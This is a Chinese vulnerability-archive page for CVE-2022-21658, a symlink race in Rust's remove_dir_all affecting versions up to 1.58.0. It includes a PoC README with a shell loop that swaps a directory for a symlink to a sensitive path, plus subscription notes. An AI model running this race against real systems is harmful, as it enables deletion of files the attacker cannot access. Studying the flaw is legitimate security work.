CVE-2022-21658 PoC — Rust 竞争条件问题漏洞
关联漏洞
标题:
Rust 竞争条件问题漏洞
(CVE-2022-21658)
Description:Rust是Mozilla基金会的一款通用、编译型编程语言。 Rust 中存在竞争条件问题漏洞,该漏洞源于产品的std::fs::remove_dir_all函数未对用户权限进行有效验证。攻击者可通过该漏洞删除不能访问的文件和目录。以下产品及版本受到影响:Rust 1.0.0 至 1.58.0 版本。
Description
POC for cve-2022-21658
介绍
# CVE-2022-21658 poc
**Make sure the use the Rust 1.58.0 version**.
First run:
```sh
while :; do mkdir /tmp/legit; rm -r /tmp/legit; ln -s /tmp/sensitive /tmp/legit; done
```
Then:
```sh
cargo run
```
文件快照
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →